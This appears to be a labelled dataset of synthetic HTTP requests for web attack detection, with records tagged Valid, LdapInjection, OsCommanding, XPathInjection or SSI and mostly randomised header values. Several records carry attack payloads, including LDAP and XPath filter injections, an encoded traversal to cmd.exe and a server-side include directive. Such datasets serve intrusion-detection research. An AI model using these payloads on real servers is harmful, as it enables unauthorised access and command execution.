class: LdapInjection
GET /wJbWDlDUOELCna/ooAxkdfi60tnainn/hhlujTcyo4.shtml?OtuusNtoceetrer=4199&Wsock_streamp_Le=dr1xyl&honamnr=5rse9sceu5&stigir2=tuodocument&fs=DhhlBlhr&O2XoBGnMV3=rC&fdTtrs=oltq&u8cseSoewTinl=122140&sr=723595&taanet=25940&6rupn7rsm5=tutas%29%28%26%28objectClass+%3Dhttg*%29&eyd=tdXh2JFL HTTP/1.1
Host: 70.76.238.62
Connection: close
Accept: text/*, text/*;q=0.0, audio/x-wav
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: eIn872a-I, eyf-sbiedd
Cache-Control: iirt=reh
Client-ip: 64.67.93.181
Cookie: 5s=ipassthru;6BS_position@rBL-dropT=tw\r5nq;swO-V=l2Ssr;BmwhereRyGlE3ZP=283
Cookie2: $Version="25"
Date: Sun, 01 Aug 04 16:15:33 CET
ETag: W/"k_eK26HPsis_XTtOs"
Expect: 4UHf=yc9Ggg;iOlgaObr=Elden
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Wed, 25 Nov 09 17:06:42 UTC
If-Unmodified-Since: Sun, 17 Jun 07 08:40:59 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 10 Nov 09 24:54:11 GMT
Max-Forwards: 79
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic dWFlMDpEZHlhZW8=
Authorization: Basic ZWw5dDM6VXNzVXNh
Range: 77-8,-1840,4277-
Referer: /hdeotgna/ou2foa.aspx
TE: chunked;q=0.3,deflate,trailers
Trailer: User-Agent
User-Agent: fr7dSfl/4.0.8
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 4.1 www.9len.shtml:058, 6.7 121.38.160.197
Transfer-Encoding: gzip
Upgrade: coid/6.4, u7a/5.9, ltuf/8.7, 7Shik/8.1, mtto/2.2
Warning: 960 www.tzoEs.tiff "dlespebn" "Wed, 09 Aug 06 04:59:18 CET"
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 9686105266248523
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37892
Start - Id: 6625
class: Valid
PUT /nIF.4_XC/MT9/tyiDtoufetuaegnj/8sz.jsp? HTTP/1.1
Content-Length: 241
Content-Language: Ixnei
Content-Encoding: gzip
Content-Location: /fLLn/ceecihF/ihakapqi.php4
Content-MD5: N2RoejJyYTNzbGNwaklsbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 11 Nov 08 06:02:45 CET
Last-Modified: Mon, 22 Jan 07 16:13:48 CET
Host: www.r1eH7glc1.be
Connection: eEas
Accept: image/*;q=0.7, audio/*;q=0.1, text/html;q=0.0
Accept-Charset: iso-10646-ucs-2;q=0.5, macintosh, utf-7;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=8
Client-ip: 54.197.158.136
Cookie: xAOqQ.5m=sta;sroyk0nna=506;etnqvatefurkdd=+TCeN;rRrieibehcFs=bservicesinput;QAbgsoundADfE=Yndt
Cookie2: $Version="4"
Date: Wed, 21 Apr 04 19:35:56 UTC
ETag: "eEKjFXirf.RRmxE3"
Expect: 100-continue
From: eoAaEax@lpusiacur.fr
If-Modified-Since: Sat, 17 Jan 09 19:50:10 CET
If-Unmodified-Since: Mon, 22 Sep 08 01:59:30 GMT
If-Match: *
If-None-Match: "QgC-5CQZZFfVrK7"
If-Range: *
Max-Forwards: 7672
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: zmtsI sarl0ue=aryfers
Authorization: recs ee3ejr=annon
Range: 9-
Referer: http://HssxrOad.com/ioir4acr/gpahbo5/er2uaem/0dTpls.conf
TE: trailers,chunked;q=0.3
Trailer: Pragma
User-Agent: eDus (i3JWPU)
UA-CPU: MIPS
UA-Disp: 7646,961,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7771x7068
Via: 5.0 42.73.17.121, 6dv/6.5 www.mnrvoe.gif
Transfer-Encoding: identity
Upgrade: thsp8p/2.1, eptIic/7.2
Warning: 729 228.123.175.18:441 "a6o1oy" "Wed, 13 Apr 05 04:36:18 UTC"
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

ioi3ecO=e&wisreb=ie&Eddz2I7seF=3476391775&1Sv5HfCucE2=sei&ebss9eef=0&0r=59865079&HeNtW=4ct&ryP_e8D7XOlD=sqdlvrnibeacty3ce&0dImYU75htaccesallx.system=Nassd&Nmyofshbl5ieeBt=3052&iframeIZupdateMu=e&:t]&oeys80aC=o&fn6essshegte=d?eifopty 

End - Id: 6625
Start - Id: 43890
class: OsCommanding
GET ..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.KS5zehew.st:9609
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, deflate;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 132.194.132.1
Cookie: baibomretuek=YsxxsaEoai;HKq2Yt8=75848432;srIjciMhitluy=i8;aOk4zsjdottae=]r[dhpnl
Cookie2: $Version="836"
Date: Mon, 26 Feb 07 24:12:55 CET
ETag: W/"d-3S9kQ58tYQbNiwAuAI"
Expect: 100-continue
From: 9HsNes@1a7h.biz
If-Modified-Since: Sat, 06 Sep 08 10:36:35 CET
If-Unmodified-Since: Sun, 19 Mar 06 17:19:41 GMT
If-Match: *
If-None-Match: "xmMfbKlWK96TC2ZB"
If-Range: Wed, 13 Oct 04 08:34:10 GMT
Max-Forwards: 852
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: Basic dGFndGE6dHNhc2k4
Range: 3121-127,822-
Referer: /nfh1lk1/Em2fd/6e0bI/wjok/dlptt.msf
TE: chunked;q=0.2,chunked;q=0.2,gzip
Trailer: If-Match
User-Agent: 17-4qhYUY http://www.peoMltg.st
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 349x5070
Via: HTTP/0.7 221.188.184.70
Transfer-Encoding: np1euh; iwnbdsd7=rBi7ta
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 115.236.50.254
X-Serial-Number: 245906346530085
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43890
Start - Id: 37843
class: LdapInjection
GET /yfgIMYtTHQT96ssUR/e79VkJLE0EuVW._vU/KometaexecNvarPg-e92y/h0bfa/hrnebt/oOj/mhEs7m3Y/hcySAbQ/GI1RNovbscriptLKRcmdX7/ih_otWLoFOXR@Ta2fNGF/n1enajIrarPxwD.css?9n=odteticloirdkw&ehsediaShin=retie%29%28%26%28objectClass++++%3DIt*%29&dn_HJrqBx=eOlipgoisehz&zvarEpIDinjsock_stream4=tskt9dattnncspEeen HTTP/1.1
Host: www.th1x5botei.ch
Connection: keep-alive
Accept: audio/x-wav;q=0.5, image/*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: nelst='trmoredq'
Client-ip: 2.231.54.23
Cookie: sbadomOuloan=o|bscriptspmiEet;rehbii86tmyfwm=exec;itnstkgn8mrulet=netcathnph-eees;veednddk4se=42;SYcni0G=fnehqalaemtnaattia;o0taoseyTacNwt=577
Cookie2: $Version="033"
Date: Fri, 29 Jul 05 02:43:54 GMT
ETag: "v.u7W79d5gfnlTy"
Expect: dNnesabo
From: tlocso@Staohr.gov
If-Modified-Since: Sun, 14 Mar 04 06:29:18 UTC
If-Unmodified-Since: Fri, 09 Mar 07 23:25:53 CET
If-Match: *
If-None-Match: "XBOcKZN7Bz3uM7Yy"
If-Range: *
Max-Forwards: 84
MIME-Version: 0.1
Pragma: a8veae=fheo
Proxy-Authorization: xDzhen at43Wr=te5gtta
Authorization: hsedo sch1rnta=hqovoe
Range: 853418-,-430
Referer: http://www.tmnab6ts.gov/WemeI0.swf
TE: trailers
Trailer: Accept
User-Agent: Mozilla/0.8 (X11; U; Linux i586 7.7; ft-rb; rv:9.3.6) Gecko/85212672
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 707x739
Via: 7.4 61.98.87.250, FTP/1.6 34.17.157.12, 1.8 189.134.7.1:02
Transfer-Encoding: gzip
Upgrade: msdjj/6.3, nhneNR/6.0, amsilt/6.3
Warning: 819 www.pedj.gif "e9rth" "Tue, 15 Sep 09 22:46:26 GMT"
X-Forwarded-For: 138.39.90.47
X-Serial-Number: 52385869909
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37843
Start - Id: 31659
class: Valid
GET /sfHxGGNm8C@vV/a6U_btTlapi@C_us-/aIQbrUtIyG/R9/eKLoB-ihk/HAHMKwgetbtprocessing-instruction@/ineslkcomaf/yhejtohEapooa/woreect3lDlmDeaIrdax.jpg?szdT=oVO4Ngw0Ol66&passthruqLnph-UG9DLh=a HTTP/1.1
Host: www.1rher.uk:80
Connection: close
Accept: audio/x-wav;q=0.9, audio/basic;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: l-lcQ;q=0.1, egetlst-tESieoir, 0lamwhoo-kyE6, oftmbm-ecnld;q=0.9
Cache-Control: no-transform
Client-ip: 47.57.123.190
Cookie: g01iennwjm=wn  ;p7nypj=58043376;oAet8eomn=in;Oho=a:arc;Eodoudyanheot=oqe 1wexeceqs1nhba
Cookie2: $Version="04"
Date: Tue, 07 Dec 04 03:54:55 CET
ETag: "u9R.S24VRKT4-Wy"
Expect: 100-continue
From: fCrLwe@tcabt.ch
If-Modified-Since: Wed, 05 Sep 07 12:18:47 CET
If-Unmodified-Since: Thu, 07 Oct 04 19:12:32 CET
If-Match: "48S-pVBXvKa-Yjvk"
If-None-Match: *
If-Range: Mon, 09 Oct 06 19:16:04 GMT
Max-Forwards: 56
MIME-Version: 6.9
Pragma: F=tc
Proxy-Authorization: Digest cnonce="wn5we"
Authorization: NTLM dGFvTnRvZXI1dEVvU3RlczJldGxhOHVoTGVhZW54bGVpdGN0aHR3a1M=
Range: 444-
Referer: http://www.3Eenm.st/yioeriue/2Nto.txt
TE: deflate
Trailer: Warning
User-Agent: Mozilla/3.7 (Windows; U; WinNT 2.5; aa-rn; rv:2.8.1) Gecko/75518749
UA-CPU: 68000
UA-Disp: 0279,131,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 156x4922
Via: 6.4 www.dots887r.html:01
Transfer-Encoding: identity
Upgrade: setj/4.0, talset/0.4, 7ana/8.7, s1msat/8.4, Uey/0.5
Warning: 847 245.165.104.253:38182 "wolt9DaseP" 
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 049800080
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 31659
Start - Id: 15255
class: Valid
GET /hq-a/s0Qnfciiohwpc/nwWfLp4/fwN2hofa4lm/rp@c.YZsTo@j9w8se/maty.mdb?vy8rwstrodata2r=5n3bt6g3yoa&8etoai=o4ddE%2Bge&iro8hy=4&o1ojlImnS=+&ouesmepsiioOxro=iHpav&neNo4aagd=lna&eashwiI5rn6yg6=066596149 HTTP/1.1
Host: 138.83.184.233:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-1;q=0.9, windows-1257, iso-8859-2, x-mac-hebrew;q=0.8, koi8;q=0.2
Accept-Encoding: identity, deflate;q=0.3, identity, gzip;q=0.5, gzip
Accept-Language: *;q=0.3
Cache-Control: ee7Ofabh=W3ee1s
Client-ip: 185.107.95.225
Cookie: OdropRoFTstdinB=uiZXs8tAq2fa;nsbisSkny=5;ne93uge9Oi=tLNOC042yJ;yDlink4winnt=enseeTa5o?>g;pl=6666
Cookie2: $Version="9"
Date: Sun, 15 Feb 09 16:11:12 UTC
ETag: W/"IpAfcn_weU9-sG3ysE"
Expect: 8oNm=hcoe0
From: aecg@hens.de
If-Modified-Since: Sun, 29 Mar 09 23:05:59 UTC
If-Unmodified-Since: Sat, 18 Dec 04 14:39:32 UTC
If-Match: *
If-None-Match: "D1NR3ScSZ@aiOXHkyU"
If-Range: Thu, 27 Dec 07 19:44:39 GMT
Max-Forwards: 521
MIME-Version: 3.7
Pragma: 9tcCmh='hnko3s'
Proxy-Authorization: vt6o Ret2w3r=bHEdy
Authorization: NTLM c3Npa2hlZWhhaTFoQXVBd2VoNmVsb210eGV1YWF3aGVkc2lz
Range: 70862-
Referer: http://xce8t.net/eosNmge/9oSr/istace/odae/Eesrnh.js
TE: deflate;q=0.1
Trailer: Upgrade
User-Agent: ee1r7xD/6.9.9.1.4
UA-CPU: Sparc
UA-Disp: 8420,749,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 175x9558
Via: 4.2 83.11.180.95:7694, 1.1 208.58.116.179, 5.5 www.eougxye.jpeg:03
Transfer-Encoding: deflate
Upgrade: 3mbtt/4.9, e4asi/7.0
Warning: 629 www.ecbma.htm "smrFi67hp6Oamp" 
X-Forwarded-For: 231.138.207.226
X-Serial-Number: 82459741903687
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15255
Start - Id: 14340
class: Valid
GET /eq3-NMDqV7D/ec2ai20xta/eiuhg5n7tEed6temlyoe/io7ya6eteeoaO3l/929dIbayV/cgJIv8AojzW3noj2ep@W/9cstdinBz4QS9drq2/M3dGh/aqm8Eonuefe/2ttryrh9lb5sUs7orjs.jpeg?uodct7grtadedoe=t+taya&e7aeonelh=oryel&@T26-oBKQXchildi=43787&dqteerr3eresaA=y0+&rs=-Odt%3A0ht0group+byol4a&se=0Etes HTTP/1.0
Host: 130.63.98.71
Connection: ihien0ls
Accept: video/*, video/quicktime, video/*;q=0.5
Accept-Charset: windows-1250, iso-2022-jp, x-mac-cyrillic, euc-cn;q=0.9, macintosh
Accept-Encoding: *;q=0.1
Accept-Language: iae-ryrtnr2;q=0.1
Cache-Control: min-fresh=3
Client-ip: 231.15.172.193
Cookie: g1MRcv1=oTM0r6dGQJpg;eval1jmMxXuP=pranstQceE3srho;1e6ttsrkh=Tenwwuoulnii3ei;cQprllzi3deuait=rhsdeany
Cookie2: $Version="48"
Date: Tue, 31 Aug 04 22:45:00 CET
ETag: W/"WxFpJ8ctmwuCHKC"
Expect: 3tnU
From: nscEel@itiaa.net
If-Modified-Since: Fri, 25 Dec 09 23:44:41 UTC
If-Unmodified-Since: Mon, 22 Jan 07 22:09:18 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 03 May 05 12:48:30 GMT
Max-Forwards: 0523
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM NHRva29lbWNxcENmNEh0dExiTnNIdGg5bnVycnVhZXMxbHRkZQ==
Authorization: NTLM dExuZWVSb3RlQWxlc2NPdHRjc2J0dGxoaXVpZTZTTWg4aA==
Range: 15-8,471-,533189-4
Referer: /ahmouge/gdto/zttltje/397s95s/aaknma.php
TE: gzip
Trailer: Upgrade
User-Agent: eissteblsioa0zy
UA-CPU: StrongARM
UA-Disp: 5219,163,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2649x359
Via: HTTP/0.2 www.Nuhdm.shtml
Transfer-Encoding: identity
Upgrade: aoden/2.1, dhp/1.9, 6sUhhi/0.0
Warning: 189 196.13.70.59:228 "tltsnki6ief" "Fri, 30 Apr 10 24:43:17 GMT"
X-Forwarded-For: 86.196.76.2
X-Serial-Number: 202713931770679449
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14340
Start - Id: 35579
class: XPathInjection
GET /ofIK_PJDtrVPEsIYc2/xsgoe3srrai/p014-XvAD/hozi/A5/connectlsf3xQ/ZU4Jy0/2MbCt6T8N1/eilsGamttR2o/4asgl/hxsDA@.tiff?sdmfeseubo=ke%27+or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+++%27cobedbp%27++++%3D+++%27 HTTP/1.1
Host: 96.18.249.48
Connection: psxuuea
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=50554
Client-ip: 252.234.242.120
Cookie: skelweae=gVab;kArg1UR39W.Q=cu3RA3wtJllY;aTesim9Ytdltcqs=9;roytsij=8
Date: Mon, 06 Oct 08 11:00:28 CET
ETag: W/"hI@P2lhb.9ij7_jV"
Expect: 100-continue
If-Modified-Since: Thu, 04 Oct 07 13:16:26 GMT
If-Unmodified-Since: Mon, 24 Aug 09 04:14:54 GMT
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: *
If-Range: Tue, 01 Jun 04 09:16:46 GMT
Max-Forwards: 245
MIME-Version: 1.5
Pragma: Aoo6='al'
Authorization: Digest qop=ethn
Range: 1278-6
Referer: /hns7pO/ntseme/nriabe/og6yer/ihITedd.asp
TE: trailers,chunked;q=0.6,deflate;q=0.2
User-Agent: Mozilla/1.4 (compatible; MSIE 4.8; Windows NT; dcFjico; tdodi)
UA-OS: Win98
Via: 0.5 www.rathrte.css
Upgrade: qqbAbn/3.5, de6/4.4, i7xow/6.7
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 36638700307195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35579
Start - Id: 4162
class: Valid
PUT /tSsP.gif? HTTP/1.0
Content-Length: 188
Content-Language: jhmrhqrt
Content-Encoding: deflate
Content-Location: /eaattld.jsp
Content-MD5: ZXJydGZyczB1c3dubjNzdg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Aug 09 11:48:59 CET
Last-Modified: Mon, 29 Nov 04 09:42:12 CET
Host: www.5momesdih.gov:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-3;q=0.6, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: diIleT-ad, nZ-coo, kCemlmh-oo2Tc;q=0.7, acd-cao;q=0.0, hiirifm-ehm;q=0.2
Cache-Control: no-store
Client-ip: 27.207.2.84
Cookie: ss=78893218
Cookie2: $Version="772"
Date: Tue, 21 Mar 06 09:21:39 UTC
ETag: W/"TOzFfs1syesKdnln"
Expect: hjEoi=mo2dsl
From: Cfmatoy@rdbndch0ft.fr
If-Modified-Since: Fri, 21 Mar 08 10:15:02 UTC
If-Unmodified-Since: Tue, 09 Jun 09 15:19:32 GMT
If-Match: "2uL4crWCYX8BIik7D3o"
If-None-Match: "nImZHRa8Txpoghq6"
If-Range: "TdyKuCIf1wLnohkc4.o"
Max-Forwards: 812
MIME-Version: 4.8
Pragma: ehn='7ou7z88s'
Proxy-Authorization: NTLM dUg3bXQxdWl1b2VJZVFtZmlvckNibkllYXVuc2NkaHJyMDFwZQ==
Authorization: NTLM aG9hbHRDY2F0ZGVucmV0c0FsZW9xaHJpZ2Q3YWx0MmFJbGFlaGRhOQ==
Range: -9,-905
Referer: http://sots8vg.cz/dt4drrnY.msf
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.5 (X11; U; Solaris 7.0; me-li; rv:7.3.7) Gecko/86624248
UA-CPU: x86
UA-Disp: 192,906,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 872x878
Via: FTP/4.3 173.1.82.222, FTP/1.4 www.dgazy3.js, 8.3 www.tl1ese.htm
Transfer-Encoding: 8dxl; 5dnNetcr=aiefuy
Upgrade: ahpr/8.4, iraUdd/9.2, cnc6/0.3
Warning: 033 www.ht6forRg.shtml "vwcfh1evolhtnobct" 
X-Forwarded-For: 182.55.25.220
X-Serial-Number: 5833814723
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eyppbeseo=o.T5.HO&bu=Eswtpolwnsdicb&le3rezg=dogte&CdaFmedEqDmdign=eX&xseYVbD=03009&rcaeasntuePd=3zb4Fwx&Wza=d~w &ss0seiY=baetcSa=leho$&oeoeil3ee2oaedk=hnodleEu635ess&iaccehexu=521262

End - Id: 4162
Start - Id: 37858
class: LdapInjection
GET /c@mpYmma65y944sCbV/eDpM5G3/e0MLg.dll?aeh1i3q2gz1Boi=t&4nB.A=0021&oei=m.La&suInR=t19ptlppd&n4ewjOdq=hodnpsnahe&fofseonR=%29%28++++%7C++%28+++cn%3D*o+++%27brien*+++%29%28mail++++%3D*o+%27brien*++++%29++++&lu=9Eesb2&idoncp5=wcnca&rgoetahkouotnae=eieh%5CInoy&ei5i0pegileq=boot.ini-4%25AaMwj%7Cwcc7 HTTP/1.0
Host: 165.24.219.186
Connection: close
Accept: audio/x-wav
Accept-Charset: hz-gb-2312, gb2312;q=0.1, x-mac-korean, hz-gb-2312, windows-1250;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=155
Client-ip: 177.246.9.242
Cookie: thusritt=objectilicaetc+h;7sp=48
Cookie2: $Version="49"
Date: Thu, 14 Jul 05 19:37:27 GMT
ETag: "QM2AbarDrp.Gbbqs7pd"
Expect: ealdo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Tue, 23 Mar 04 21:15:01 UTC
If-Unmodified-Since: Sat, 25 Oct 08 07:48:57 CET
If-Match: *
If-None-Match: *
If-Range: "g.eXlvzwong6b-P_NM"
Max-Forwards: 1
MIME-Version: 7.8
Pragma: enq=dd
Proxy-Authorization: Digest username="otjbsa"
Authorization: Basic YW9odzpsb3Vi
Range: 3-43,-454,28574-
Referer: http://Cah56g.com/36ga/Crcrsti.zip
TE: trailers,chunked;q=0.7,trailers
Trailer: Referer
User-Agent: llok7sluizh
UA-CPU: x86
UA-Disp: 8628,0806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 649x451
Via: FTP/8.5 www.tififilr.shtml
Transfer-Encoding: deflate
Upgrade: obeThi/2.4, ems/4.7
Warning: 340 www.t8Tb0.gif "i52D9owoehei2ibsei" "Thu, 30 Dec 04 01:19:45 CET"
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37858
Start - Id: 30638
class: Valid
GET /0CeWFAC8CW-UNTt/Aw3-5gUR1vM5Sxml/cSo2r9zXGAFHqTkY6Kw/snohElwe.mspx?8yk=scnxd&KTPJWxn=nodethwgetw&Lp00c=sC8jC4&mvwoJ=153744&tclacvro=8io&5ixondth9h=6426&aepsse=32692226&TtnEEnaahl2=hsnaGjre2u&anotizb=tYI&rHitgfiwpteas=8193117&.XZ3ZRvHaccess_logko=onicee%25ncrr HTTP/1.0
Host: 184.189.47.158:3521
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=247
Client-ip: 108.206.92.164
Cookie: _UvMtx49X=tah h;jttNdiSn1oEQ=in9i;1YhhavAo8e=EnG;ldpsn=5357;eph=meta
Cookie2: $Version="41"
Date: Wed, 28 Apr 04 04:08:44 GMT
ETag: W/"5_T8gKhVZEx2KNH-1Jl"
Expect: ecesa=ii2iz;5olr
From: 5mirr@nzOn.fr
If-Modified-Since: Thu, 23 Aug 07 15:36:00 CET
If-Unmodified-Since: Mon, 12 Dec 05 07:28:50 GMT
If-Match: *
If-None-Match: "NVnzpRxmrRfi@ccJ"
If-Range: Sat, 11 Nov 06 20:03:45 UTC
Max-Forwards: 9863
MIME-Version: 7.9
Pragma: rlniRi=teoaS
Proxy-Authorization: NTLM aWVpZXBoZWpjaGlua2VpdzFpZWV5RWhhdGRpZWVsd2JuZg==
Authorization: NTLM YUxnY2dzc283amlwYXQwQVNlc25vNW9leUVuZWVkdGV1cmZucGFlYzJkMG5m
Range: 53103-346,27315-,4154-522
Referer: http://www.odrxlyeS.ch/LEnenV/6cdolfr.php
TE: deflate
Trailer: Transfer-Encoding
User-Agent: dotJduyaa (sw6JnX-1; fvy1ddYO; mUCfw4)
UA-CPU: Sparc
UA-Disp: 6504,8674,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7462x1873
Via: 3.6 130.23.14.234
Transfer-Encoding: hlfN6
Upgrade: 1iwe/2.5, d7sg/1.2, hcsso/4.8
Warning: 720 www.EsiaJw.png "nonetehehweionsu" 
X-Forwarded-For: 115.201.164.251
X-Serial-Number: 330746
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 30638
Start - Id: 9067
class: Valid
GET /aathsake8mcfbc/nni5/pXftfHeTJcQ@JA3/eEiec/u@d7.82.css?a1btfraohlo=5858970680&4xXaccess_logFnf1=+tol&hat2laaogRaeuDa=osnviuh&R2formUbG=aunshutdown%29&dEirpsrihea5ooo=epea&yofd0oth=6.qaXQOWd&LBBE1E=tRnltyxslZns1l&logom6m=63&aqfym=amyfoI&es8uororyiertu=0a&cheO3EashreN0te=nenk9komenqieeobEr&ys=exesr0lse&irlieeennnrhii=%5B2vbscript%7C2 HTTP/1.0
Host: www.ulessti6ds.st:85221
Connection: ehsoem
Accept: */*
Accept-Charset: us-ascii;q=0.0, x-mac-korean;q=0.0
Accept-Encoding: 
Accept-Language: aidxda-omatEdde, oae7M-lueatwE, moirrnA-e1n, oeE-Etanr9D;q=0.8
Cache-Control: max-age=34328
Client-ip: 3.88.112.11
Cookie: -LUBs2z=eg mgh ltu7om u;xhokn4assetl3or=d6Z annRtAsnsai;OgwinntUlikeEdrop=?a;sF5obinSorq1=462873565
Cookie2: $Version="18"
Date: Mon, 04 Jan 10 23:09:07 CET
ETag: "sS.c56WXGb47EKtK8"
Expect: 100-continue
From: ueP9ir@rAnlhe.it
If-Modified-Since: Wed, 20 May 09 19:29:49 CET
If-Unmodified-Since: Wed, 09 Jan 08 07:43:08 GMT
If-Match: *
If-None-Match: "OpVpvHhG@5xTId9Qi8j"
If-Range: Mon, 14 May 07 06:40:15 GMT
Max-Forwards: 140
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: rneu expZ=5wizus
Authorization: NTLM clN1eG5laE9pYW1tY2Z5YWF1bmhvY2FhczNzdTR5bmZuVGVoaW55YWU=
Range: 749326-1,361-,-463170
Referer: /e6ttd/tvdilns.html
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/6.4 (compatible; Konqueror/9.8; Open BSD i386; ndnneuoG; eUd2; iatIatnga)
UA-CPU: 68000
UA-Disp: 6130,9479,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 582x1826
Via: 2.7 221.187.2.156, 4.7 240.229.201.226, vuIds/1.4 93.67.200.203
Transfer-Encoding: whtd8; n02ugns=UitlmXi
Upgrade: Ektmi/4.4, l0dr/4.3, sifbE/1.7, ejpbmd/3.6
Warning: 991 177.26.146.73 "etpo8OtaAfvisutud9o" "Tue, 12 Dec 06 02:41:54 UTC"
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 442361
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 9067
Start - Id: 1684
class: Valid
GET /netFreneitl/wmHVMaTUSDq/pdQt/AeiEYyEmaulr9rPah/n7oj/euq_9.B73.jpeg? HTTP/1.0
Host: 180.28.121.54
Connection: sdeEtyS
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=4
Client-ip: 77.199.112.25
Cookie: 6@_Jwp-U5K=dNe;no6ctsr=usvleact;td4eo1e8galr4=DtetLSrhoa;IIa30=tese40hbhzwreucttc
Cookie2: $Version="36"
Date: Tue, 28 Feb 06 21:09:15 CET
ETag: "yU2fiKRYvx4Fvdtgokxp"
Expect: oeontso=mhebs;aosd=0gc1px
From: iNaNl@nioce.ch
If-Modified-Since: Sat, 16 Oct 04 15:24:46 CET
If-Unmodified-Since: Fri, 17 Jun 05 11:37:22 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 04 May 06 15:29:05 CET
Max-Forwards: 9961
MIME-Version: 3.5
Pragma: dH='n'
Proxy-Authorization: Digest username="o3aarj"
Authorization: 8eme n6hfde4=ncmr
Range: 73-
Referer: http://aotaTe.net/iBcnautE/Tetr.cgi
TE: gzip;q=0.6,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/0.2 (Machintosh; U; Mac OS X 9.5; ri-ny; rv:4.2.5) Gecko/04679734
UA-CPU: StrongARM
UA-Disp: 1503,019,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3865x207
Via: FTP/1.4 13.27.43.58, 1.1 78.92.97.26
Transfer-Encoding: identity
Upgrade: edsh/1.1, 0e3eaA/2.7, 9eisMe/2.7
Warning: 541 www.tsaq.css "udtierkfde3nlrocns" "Mon, 14 May 07 03:02:21 CET"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 3355979393710804862
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1684
Start - Id: 39259
class: SSI
GET /oV--di@CnsSWV@iQgm/smithHe/tjn.rPjPbvw.msf?5xml_perlAOBUbgsound=69&shi=arhaus3ereval7%3Ast&irNcHeixnta=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&aharlnIoca=11&Yt7od3yowTheOs=25224468&eaeQeceae=281887 HTTP/1.1
Host: www.1ti4ltEi.cz
Connection: lriemt
Accept: text/plain, image/png;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.9
Accept-Language: *;q=0.7
Cache-Control: max-age=673
Client-ip: 120.3.200.190
